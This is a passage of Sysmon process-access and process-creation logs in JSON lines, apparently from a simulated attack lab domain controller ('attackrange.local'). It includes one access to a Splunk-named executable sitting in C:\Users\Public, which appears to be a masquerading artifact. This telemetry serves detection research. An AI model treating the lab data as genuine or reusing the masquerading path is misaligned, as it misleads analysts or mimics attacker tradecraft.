06:55:58.955","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:58","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6236,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:58.955\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-0010F6780500}\r\nSourceProcessId: 3336\r\nSourceThreadId: 1980\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-11D4-5F25-0000-0010E7070800}\r\nTargetProcessId: 3840\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:58.955","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-0010F6780500}","SourceProcessId":"3336","SourceThreadId":"1980","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-11D4-5F25-0000-0010E7070800}","TargetProcessId":"3840","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6237,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:59.080\r\nSourceProcessGUID: {E2A3D6B1-11FE-5F25-0000-0010281D0900}\r\nSourceProcessId: 3840\r\nSourceThreadId: 4828\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nTargetProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nTargetProcessId: 1828\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:59.080","SourceProcessGUID":"{E2A3D6B1-11FE-5F25-0000-0010281D0900}","SourceProcessId":"3840","SourceThreadId":"4828","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","TargetProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","TargetProcessId":"1828","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6238,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:59.533\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3576\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:59.533","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3576","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:56:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":6239,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:59.940\r\nProcessGuid: {E2A3D6B1-11FF-5F25-0000-0010011F0900}\r\nProcessId: 4820\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nFileVersion: ?\r\nDescription: ?\r\nProduct: ?\r\nCompany: ?\r\nOriginalFileName: ?\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\" --ps2\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C\r\nParentProcessGuid: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nParentProcessId: 1828\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:55:59.940","ProcessGuid":"{E2A3D6B1-11FF-5F25-0000-0010011F0900}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","FileVersion":"?","Description":"?","Product":"?","Company":"?","OriginalFileName":"?","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\" --ps2","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C","ParentProcessGuid":"{E2A3D6B1-1103-5F25-0000-00101A740500}","ParentProcessId":"1828","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 06:56:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6240,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:59.940\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nSourceProcessId: 1828\r\nSourceThreadId: 1376\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {E2A3D6B1-11DA-5F25-0000-001016CB0800}\r\nTargetProcessId: 4820\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:59.940","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","SourceProcessId":"1828","SourceThreadId":"1376","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{E2A3D6B1-11DA-5F25-0000-001016CB0800}","TargetProcessId":"4820","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:56:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6241,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:59.940\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-11DA-5F25-0000-001016CB0800}\r\nTargetProcessId: 4820\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:59.940","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-11DA-5F25-0000-001016CB0800}","TargetProcessId":"4820","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:56:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6242,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:59.940\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:59.940","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:56:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6243,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:59.940\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:59.940","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:56:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6244,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:59.940\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 